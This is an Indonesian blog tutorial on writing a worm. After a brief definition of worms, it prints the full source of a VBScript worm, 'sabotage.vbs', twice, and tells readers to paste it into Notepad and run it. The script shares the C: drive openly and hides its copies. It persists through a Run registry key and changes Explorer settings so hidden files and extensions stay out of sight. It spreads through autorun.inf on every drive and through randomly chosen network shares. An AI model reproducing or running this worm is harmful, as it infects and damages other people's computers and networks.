Kali ini kita bakalan belajar membuat worm, Disini saya terangkan sedikit apa itu Worm, Worm ditujukan kepada program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya tinggal di memory. Worm dapat dengan cepat memperbanyak diri dan biasanya dilakukan pada media LAN atau Internet, resources jaringan yang terinfeksi akan habis bandwidthnya dibanjiri oleh worm yang akan mengakibatkan melambatnya aliran data. Contoh worm: I-Worm/Happy99(Ska), I-Worm/ExploreZIP, Sobig, Nimda, Code Red, Sircam. Worm umumnya berbentuk file executable (berekstensi .EXE atau .SCR), yang terlampir (attach) pada email. Namun demikian, ada beberapa jenis worm yang berbentuk script yang ditulis dalam bahasa Visual Basic (VBScript).
Udh gk sabar kan??
'54807463
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:\", "s:\")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe \"
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM\" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:\", "s:\")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe \"
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM\" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
setelah itu loE copy paste di notepad kemudian dengan nama terserah anda misalkan ( belajar.vbs ) inget dblakang nama worm itu hrs vbs!! liat gambar dibawah ini!!
